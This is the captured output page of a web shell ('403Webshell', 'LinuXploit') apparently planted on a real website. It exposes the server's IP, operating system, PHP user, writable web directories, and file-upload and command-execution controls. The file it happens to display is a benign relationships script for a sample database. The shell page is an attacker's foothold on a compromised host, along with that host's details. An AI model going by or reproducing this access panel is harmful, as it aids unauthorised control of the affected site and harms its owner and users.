403Webshell
Server IP : 103.118.17.23  /  Your IP : 216.73.216.188
Web Server : Microsoft-IIS/10.0
System : Windows NT RESELLERPLESK22 10.0 build 20348 (Windows Server 2016) AMD64
User : IWAM_plesk(default) ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/vhosts/mesa.org.in/httpdocs/assets/_core/php/examples/code_generator/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : E:/Inetpub/vhosts/mesa.org.in/httpdocs/assets/_core/php/examples/code_generator/relationships.txt
# Virtual "Foreign Key" Relationships Script for the sample Examples Database (MyISAM version)
# Relationships are defined as:
#     table1.column1 => table2.column2
# where column1 is a FK to column2


# Login Table
login.person_id => person.id


# Project Table
project.manager_person_id => person.id
project.project_status_type_id => project_status_type.id


# TeamMember/Project Association
team_member_project_assn.person_id => person.id
team_member_project_assn.project_id => project.id


# Related Project Association (Graph)
related_project_assn.project_id => project.id
related_project_assn.child_project_id => project.id

Youez - 2016 - github.com/yon3zu
LinuXploit